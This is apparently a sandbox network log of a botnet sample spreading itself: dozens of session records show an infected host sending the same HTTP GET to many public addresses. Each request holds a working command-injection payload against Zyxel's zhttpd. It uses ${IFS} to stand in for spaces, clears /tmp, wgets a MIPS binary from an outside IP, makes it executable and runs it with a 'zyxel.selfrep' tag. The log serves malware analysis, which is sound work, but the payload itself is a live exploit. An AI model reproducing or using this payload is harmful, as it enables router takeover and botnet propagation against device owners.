                                                Jan 12, 2024 18:24:45.087201118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6805192.168.2.1345854216.31.211.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087255955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6806192.168.2.135914485.158.12.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087318897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6807192.168.2.1360502130.130.111.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087346077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6808192.168.2.1336866183.199.62.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087403059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6809192.168.2.1349904162.90.171.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087443113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6810192.168.2.135395258.79.57.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087500095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6811192.168.2.1356870181.197.205.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087549925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6812192.168.2.133923081.183.1.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087596893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6813192.168.2.1346808205.225.35.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087652922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6814192.168.2.1356750168.237.110.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087685108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6815192.168.2.1336342148.226.245.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087749004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6816192.168.2.1346430183.205.159.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087809086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6817192.168.2.134785081.189.225.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087851048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6818192.168.2.1335532152.141.12.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087898016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6819192.168.2.1341182115.26.93.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087975979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6820192.168.2.135413832.177.240.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088035107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6821192.168.2.1343982187.93.22.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088102102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6822192.168.2.1349140118.40.40.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088141918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6823192.168.2.1352882176.253.52.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088208914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6824192.168.2.1353654181.31.215.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088263988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6825192.168.2.134622059.115.121.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088299990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6826192.168.2.134682036.214.57.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088361025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6827192.168.2.135300483.169.93.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088430882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6828192.168.2.134741486.174.166.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088488102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6829192.168.2.1355934168.61.179.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088552952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6830192.168.2.134071825.117.170.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088597059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6831192.168.2.1357140154.175.41.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088640928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6832192.168.2.134367851.0.79.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088701010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6833192.168.2.1350738187.65.241.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088726044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6834192.168.2.1339368210.0.145.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088821888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6835192.168.2.134851814.204.179.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088879108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6836192.168.2.1345700140.211.202.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088924885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6837192.168.2.1351626179.216.86.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088969946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6838192.168.2.133702095.22.83.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.088999987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6839192.168.2.1360058153.243.224.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089050055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6840192.168.2.1344962170.234.216.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089111090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6841192.168.2.1353158199.78.29.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089158058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6842192.168.2.1334818208.242.231.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089212894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6843192.168.2.135862864.230.152.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089255095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6844192.168.2.1341758210.87.231.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089323997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6845192.168.2.1351258184.60.112.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089349031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6846192.168.2.134935290.242.8.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089385986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6847192.168.2.133674857.185.46.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089433908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6848192.168.2.1351292211.150.129.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089495897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6849192.168.2.133914089.255.208.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089550972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6850192.168.2.1336130110.170.16.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089617014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6851192.168.2.1356656161.100.79.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089690924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6852192.168.2.1338482135.235.213.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089741945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6853192.168.2.1347914178.158.203.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089807987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6854192.168.2.135782842.178.76.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089859009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6855192.168.2.134090286.68.123.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089934111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6856192.168.2.1347742196.25.71.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.089956999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6857192.168.2.1354174217.163.242.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090009928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6858192.168.2.1337584123.92.185.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090049982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6859192.168.2.135351812.86.144.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090133905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6860192.168.2.1346824188.118.107.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090169907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6861192.168.2.1333966161.69.196.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090223074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6862192.168.2.135458857.117.253.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090342999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6863192.168.2.133873644.34.102.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090383053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6864192.168.2.135554618.164.16.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090419054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6865192.168.2.1333602192.13.253.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090486050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6866192.168.2.133302880.222.16.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090543032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6867192.168.2.1337586203.85.96.175443
                                                TimestampBytes transferredDirectionData
